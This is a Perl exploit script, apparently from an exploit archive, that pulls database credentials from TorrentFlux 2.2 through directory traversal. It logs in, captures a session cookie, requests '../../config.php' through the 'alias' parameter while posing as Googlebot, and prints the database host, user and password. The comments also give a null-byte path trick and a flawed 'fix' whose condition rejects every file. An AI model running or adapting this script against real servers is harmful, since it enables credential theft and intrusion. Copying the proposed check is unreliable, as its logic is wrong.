160 lines
No EOL
7.4 KiB
Perl
Executable file
160 lines
No EOL
7.4 KiB
Perl
Executable file
#Description:
|
|
|
|
#TorrentFlux fails to sanitise the variable "alias" in downloaddetails.php. This allows an
|
|
#attacker to include any file they want; the contents is displayed at in the spaces provided
|
|
#and the remaning data is displayed as error messages on the page. Overall Torrentflux makes it
|
|
#look quite nice. Solution use SecurityClean() of viewnfo.php to solve the problem.
|
|
|
|
# Note: After just looking at the code for viewnfo.php of TorrentFlux 2.1, it would seem that
|
|
# it is possible to also read the config.php file in the same way, since path was not sanitised.
|
|
# Although they have fixed this problem in 2.2 with a function i demonstrated to the
|
|
# developer for a previous vulnerability. Exploit: viewnfo.php?path=../config.php
|
|
|
|
# Just a thought, SecurityCleanPath() could look a bit nicer like so:
|
|
# From:
|
|
#if( (strtolower( substr( $string, -4 ) ) == ".txt") || (strtolower( substr( $string, -4 ) ) == ".nfo") )
|
|
# {
|
|
# // we are good
|
|
# }
|
|
# else
|
|
# {
|
|
# AuditAction($cfg["constants"]["error"], "Not a text or NFO: " . $string);
|
|
# die("Invalid file specified. Action has been logged.");
|
|
# }
|
|
|
|
#To:
|
|
#if( (strtolower( substr( $string, -4 ) ) != ".txt") || (strtolower( substr( $string, -4 ) ) != ".nfo") )
|
|
#{
|
|
# AuditAction($cfg["constants"]["error"], "Not a text or NFO: " . $string);
|
|
# die("Invalid file specified. Action has been logged.");
|
|
#}
|
|
# And it would seem for some reason if you do you change the above code it prevents you from
|
|
# using a null character to access any file in the current or above directory. 2.2 is
|
|
# vulnerable to this. EG: viewnfo.php?path=../config.php%00.txt (but since you cant go back
|
|
# a directory it doesn't help much - and you are stuck in the downloads, or above directories).
|
|
|
|
# r0ut3r (writ3r [at] gmail.com)
|
|
|
|
#################################################################################################
|
|
# r0ut3r Presents... #
|
|
# #
|
|
# Another r0ut3r discovery! #
|
|
# writ3r [at] gmail.com #
|
|
# #
|
|
# TorrentFlux 2.2 Database Credentials Exposure Exploit #
|
|
#################################################################################################
|
|
# Software: TorrentFlux 2.2 #
|
|
# #
|
|
# Vendor: http://www.torrentflux.com/ #
|
|
# #
|
|
# Released: 2006/12/09 #
|
|
# #
|
|
# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com) #
|
|
# #
|
|
# Note from a developer: "Valid TorrentFlux user IDs are REQUIRED and this is NOT an open #
|
|
# vulnerability to a NON user". #
|
|
# #
|
|
# Note: The information provided in this document is for TorrentFlux administrator #
|
|
# testing purposes only! This vulnerability requires a user account. #
|
|
# #
|
|
# Apart from a few problems (which are fixed) TorrentFlux is a great torrent client. #
|
|
# Download it at: http://www.torrentflux.com/ #
|
|
#################################################################################################
|
|
|
|
use IO::Socket;
|
|
|
|
$port = "80"; # connection port
|
|
$target = @ARGV[0]; # torrentflux.com
|
|
$folder = @ARGV[1]; # /torrentflux/
|
|
$user = @ARGV[2]; # login username
|
|
$pass = @ARGV[3]; # login password
|
|
|
|
sub Header()
|
|
{
|
|
print q
|
|
{#################################################################################################
|
|
# r0ut3r Presents... #
|
|
# #
|
|
# Another r0ut3r discovery! #
|
|
# writ3r [at] gmail.com #
|
|
# #
|
|
# TorrentFlux 2.2 Database Credentials Exposure Exploit #
|
|
#################################################################################################
|
|
};
|
|
}
|
|
|
|
sub Usage()
|
|
{
|
|
print q
|
|
{
|
|
Usage: db_tf2.pl [target] [directory] [username] [password]
|
|
Example: db_tf2.pl torrentflux.com /torrentflux/ r0ut3r testing123
|
|
};
|
|
exit();
|
|
}
|
|
|
|
Header();
|
|
|
|
if (!$target || !$folder || !$user || !$pass) {
|
|
Usage(); }
|
|
|
|
print "\n[+] Connecting...\r\n";
|
|
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
|
|
print "[+] Attempting to login\n";
|
|
print $sock "GET ".$folder."login.php?username=$user&iamhim=$pass HTTP/1.1\n";
|
|
print $sock "Host: $target\n";
|
|
print $sock "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
|
|
print $sock "Accept: text/html\n";
|
|
print $sock "Connection: keep-alive\n\n\r\n";
|
|
|
|
while (<$sock>)
|
|
{
|
|
if (/Cookie: TorrentFlux=(.*?);/)
|
|
{
|
|
$cookie = "TorrentFlux=$1";
|
|
}
|
|
}
|
|
|
|
print "[+] Successfully logged in\n";
|
|
print "[+] Cookie: ".$cookie."\n";
|
|
if ($cookie eq "")
|
|
{
|
|
print "[-] Failed to login. Exiting...";
|
|
exit();
|
|
}
|
|
|
|
print "[+] Sending request\n";
|
|
|
|
$xpack = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt. Exiting...\r\n";
|
|
print $xpack "GET ".$folder."downloaddetails.php?alias=../../config.php HTTP/1.1\n";
|
|
print $xpack "Host: $target\n";
|
|
print $xpack "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
|
|
print $xpack "Accept: text/html\n";
|
|
print $xpack "Cookie: ".$cookie."\n";
|
|
print $xpack "Connection: keep-alive\n\n";
|
|
print "\n---------- Exploit Results ----------\n\n";
|
|
|
|
while (<$xpack>)
|
|
{
|
|
if (/db_type"] = "(.*?)";/) {
|
|
print "Type: $1\n"; }
|
|
if (/db_host"] = "(.*?)";/) {
|
|
print "Host: $1\n"; }
|
|
if (/db_name"] = "(.*?)";/) {
|
|
print "Name: $1\n"; }
|
|
if (/db_user"] = "(.*?)";/) {
|
|
print "User: $1\n"; }
|
|
if (/db_pass"] = "(.*?)";/) {
|
|
print "Pass: $1\n\n";
|
|
$res = true; }
|
|
}
|
|
if ($res eq false) {
|
|
print "[-] Exploit failed - Not vulnerable\n"; }
|
|
|
|
print "[!] Connection to host lost...\n";
|
|
|
|
#################################################################################################
|
|
# This has been another r0ut3r discovery - writ3r [at] gmail.com #
|
|
#################################################################################################
|
|
|
|
# milw0rm.com [2006-12-09] |